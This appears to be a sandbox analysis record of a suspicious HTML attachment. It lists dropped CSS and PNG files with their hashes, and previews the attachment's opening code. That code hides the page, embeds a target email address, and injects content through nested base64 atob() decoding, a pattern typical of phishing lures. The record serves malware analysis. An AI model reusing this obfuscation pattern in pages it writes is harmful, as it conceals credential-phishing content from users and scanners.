                        Preview:@font-face{font-family:'OffSMDL2';src:url('/socfonts/OffSMDL2.4.50.woff') format('woff')}@font-face{font-family:'SupportMDL2';src:url('/socfonts/SupMDL2.4.66.woff') format('woff')}@font-face{font-family:'OffSMDL2';src:url('/socfonts/OffSMDL2.4.50.woff') format('woff')}@font-face{font-family:'SupportMDL2';src:url('/socfonts/SupMDL2.4.66.woff') format('woff')}html[dir="rtl"] .supHomeAndLandingPageSearchButton{right:auto;left:0}html[dir="rtl"] .supHomeAndLandingPageSearchBox{padding:0 18px 0 50px}.supHomeAndLandingPageSearchBoxForm{margin:auto;position:relative;max-width:748px}.supHomeAndLandingPageSearchBoxForm .supSuggestionList{margin:0;padding:0;list-style:none}.supHomeAndLandingPageSearchBoxForm .supAutoSuggestContainer{width:100%}.supHomeAndLandingPageSearchBoxForm .supSuggestionItem{text-indent:0;padding-left:18px}.supHomeAndLandingPageSearchBoxContainer{position:relative}.supHomeAndLandingPageSearchBox{width:100%;height:51px;font-size:1.7em;padding:0 50px 0 18px;border:1px solid #
                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                        File Type:PNG image data, 1200 x 1172, 8-bit/color RGBA, non-interlaced
                        Category:dropped
                        Size (bytes):69550
                        Entropy (8bit):7.872116071617606
                        Encrypted:false
                        SSDEEP:
                        MD5:EF24D7B889669ED456F3BB700F8482CD
                        SHA1:281923FC8E690D4E893453CBEA3B8B067CDAA4C0
                        SHA-256:6B286061B95C551419AEE456F6FEA1B09BCA0322F13BED4301FA8F944B121264
                        SHA-512:E27AD238012CFF7EAA024BB2F52C089B213D7AE6EA4496B3D5A143FADD57B6E45BB5F4AE5E8F17A37C7F93E15D574E96A816D0BD16A4AAD268D4A9AF7615C22C
                        Malicious:false
                        Reputation:low
                        Preview:.PNG........IHDR.............w.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............IDATx...w..U.......no.M...!.. U...C/..J..X.M.........P$.BBQ.QDA...T.H."%...IH...{....P.&{w........R....s>..Y#......-...6*Sl.zj.F....d.h.FO^...+[/k2...bF2u2..5U.......e?..2.*....h..+.._..n..!i...Z-..#..hm....j.<.6..;......Uj...V.............H.)S....... k.C..`.............*.YRmB.z....f.<.RE-7.YQTq..YndV.Ma...x]W.m."..........;.9.+.3.0....pc.p..i..i..K.@L[.....i..W.....%.`_.+.....r"....L.....j.d_-.Ge...x..x+..V..8.T.R..[.E#.}......o_.9.K.D........p_[[F+..3.d..m.1c%M....j.rR..y.JO..g......|s.s..............2ujs...\.v.#.d.&..m$..'.6X.9#=e...<.x.#.W.........C....Dg....v.2;...e......:V..z.z.qc....>.9sV.....(`....|.k5..];.=oWc.f?.!.l.2.<jm.~..|...f.n'..........y.....OE.e..2.v.|.A?tIz\.2z.P.....N,..$..,..P.....g...}%}J.(BA..I.~Iw.V.t^2.......H..X...OrSgM.{..5.H........!.{..}E...y/.....G.....f...>).C$....#.^.t.d.*d..5{..D..@.P......R[e.n.....t..
                        File type:HTML document, ASCII text, with very long lines (59971), with CRLF line terminators
                        Entropy (8bit):5.4082875439575435
                        TrID:
                        • HyperText Markup Language (15015/1) 55.58%
                        • HyperText Markup Language (12001/1) 44.42%
                        File name:ScannedFileCopy8475.html
                        File size:920362
                        MD5:9a580f2e9f88aad5f60b02d775596e37
                        SHA1:f9b1a8953113077f96acb4264754e94964d14d43
                        SHA256:f31f1852b141c2680ada8b4b977b6cf150efbda99a584e858a21b332452f2626
                        SHA512:c5725e9180c44f1a974f86fd9b954328f4b55cfb991e44e015578904b2476932dd752f8f40d998acfac5d1087fde12ee8beab083697a871cb4d502f74f4e4ce3
                        SSDEEP:24576:GlES4FbxosB/MK0cJLELW2Tzo1PE0RPew/AcEWw+dGoxGcTIlKm9f3fIw7Ur/0dz:Ks8aSZ
                        TLSH:D7155B13AF95DEFA9B8D5A0D54492B1C83F0711A7E23D01EED919BC4FB86C0742DA12E
                        File Content Preview:<!DOCTYPE html>..<html id="rrt" ssvv="vdaponte@sumhlc.org" lang="en">....<head></head>.. jjhhdh -->....<body style="display: none;" id="bbdy">.... <script>.. document.head.insertAdjacentHTML("beforeend", atob(atob(atob(atob(atob(atob(atob(at